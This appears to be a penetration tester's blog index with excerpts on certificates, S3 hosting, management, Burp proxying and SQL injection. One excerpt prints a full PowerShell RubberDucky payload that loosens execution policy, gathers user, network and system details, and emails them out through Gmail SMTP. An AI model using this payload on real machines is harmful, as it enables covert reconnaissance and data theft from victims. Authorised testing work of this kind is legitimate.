Recently, I celebrated a birthday. Typically, this is a joyous time, and I have many things to be grateful for. However, this birthday comes during a difficult year. As my wife and I were discussing this the other day, I realized that life can be a lot like the Atari game ‘Asteroids’. Atari Asteroids ...
In a previous post I discussed the complicated process of configuring S3 to use Letsencrypt to obtain a TLS certificate. That post served as a reference for me to re-implement Letsencrypt every 90 days. Since then, my 90-day Letsencrypt certificate expired, and I was at a loss for how to re-instate it. Using my own post as a reference didn’t help me with the arcane letsencrypt errors I was encountering. It was a pain in the ass trying to remember how to configure and use a combination of letsencrypt, awscli, virtual machines to run them in (letsencrypt has since implemented a docker option for running on OSX), et cetera, et cetera. I was hoping to get all of this done during a brief lull in my workday. Nope.jpg I’m chalking my experience up to the non-standard use case of using letsencrypt to generate a TLS certificate for a site hosted on S3. Perhaps in the future there will be native support for S3/Cloudfront sites in letsencrypt, but it’s not there yet. ...
I planned a post covering the Manager Feedback Cycle, but this blog post at Effective Managers covers most of what I was going to communicate. One thing I would add to this resource, is that both managers and subordinates should strike a balance in communications frequency: If communications are infrequent, important details can get overlooked, and it becomes harder to resolve conflicts. If communications are too frequent, the subordinate will feel like they’re being micro-managed while the manager will feel like the subordinate can’t solve problems on their own.
Apple gets a lot of flak in the InfoSec community, even though it’s an open secret that much of the InfoSec community has begun to use Apple products. I myself have been using a Mac laptop for the past ten years because they produced the first laptop I thought was worth spending money on. A lot of money. I’m a fan of Apple for more than just their products, however. I admire their stance on social issues that I care about. ...
It’s early 2016, and there are a multitude of content management systems and blog platforms out there: Wikipedia’s List of Content Management Systems The security blog I contribute to, Penetrate.IO runs on the venerable Wordpress and requires constant updates to stay one step ahead of attackers. This becomes tiresome after a while, especially since the only thing I’m interested in hosting is a series of articles. These don’t require server-side computation, simply hosting. It’s a little like web development from the late 90’s - I only require simple HTTP hosting. ...
I had the need to proxy traffic from Burpsuite to another proxy during web app testing this week. There are a few ways to do this, but this method was the easiest since I already had Burpsuite’s TLS certificate installed. For more information on this, see the Burpsuite help. To configure an upstream proxy for Burpsuite, such as OWASP ZAP, follow these steps: First, configure your upstream proxy that will sit between Burpsuite and the web application to listen on a different port since they both bind TCP 8080 by default. Here I’ve configured ZAP to listen on port 8082 : ...
This post was inspired by a client who came to me and said “I do not understand all of these findings, can you explain them to me?”, referring to my web application penetration test deliverable. We spoke for an hour, as I described the findings to him. I corrected him when his understanding was shaky, and I confirmed where his understanding was solid. He had a development background, and was studying for a security certification, but he was managing a large security project for a well-known company and I was surprised to learn he was a security newbie. At the end of our conversation, he thanked me and said “Now I understand, and I’ll make sure my manager does as well!” ...
What I hope are some reasonable basic security practice recommendations
On a recent engagement I supported the lead by developing a PowerShell payload for a RubberDucky. The gist is that it will run a handful of standard Windows commands and then e-mail the results to a specified address. It proved to be very helpful and I’ve included it below with comments: # Set execution policy to allow unrestricted script scope Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false #Create results file in current user's temp directory $results = $env:temp + '\results.txt' #Run whoami $who = 'whoami.exe' $rwho = & $who #Run ipconfig /all $ipc = 'ipconfig.exe' $ipcs = '/all' $ripc = & $ipc $ipcs #Run systeminfo $sysi = 'systeminfo.exe' $rsysi = & $sysi #Wait for systeminfo to finish Start-Sleep -s 5 #Write results $output = $rwho + $ripc + $rsysi | Out-File $results #Send results to e-mail address $hostname = $env:computername $SMTPServer = 'smtp.gmail.com' $SMTPInfo = New-Object Net.Mail.SmtpClient($SMTPServer, 587) $SMTPInfo.EnableSsl = $true $SMTPInfo.Credentials = New-Object System.Net.NetworkCredentials('<yourusername>', '<yourpassword>') $ResultMail = New-Object System.Net.Mail.MailMessage $ResultMail.From = '<fromaddress>' $ResultMail.To.Add('<destinationmail>') $ResultMail.Subject = "Mail Subject" $ResultMail.Body = "Mail Body" $ResultMail.Attachments.Add($results) $SMTPInfo.Send($ResultMail) #Optional pop-up confirmation box #Note: This WILL raise user suspicion $wshell = New-Object -ComObject Wscript.Shell $wshell.Popup("Operation Complete.", 0, "OK", 0x1) Merry Christmas and Happy Holidays! ...
Inspired by Jack Daniel’s “Shoulders of InfoSec Project”, this post will be focused on the people and technologies behind one of the most prevalent attacks on web sites: SQL injection. According to OWASP, injection is the number one attack vector for web applications. Injection attacks can target many different contexts in a web application: HTML, PHP, ASP, Javascript, SQL, etc. Any context in which an interpreter parses input to execute instructions is potentially vulnerable to an injection attack. There are several - many, rather - excellent tutorials on Injection attacks available on the web. Here’s a brief selection of SQL injection attacks for reference: ...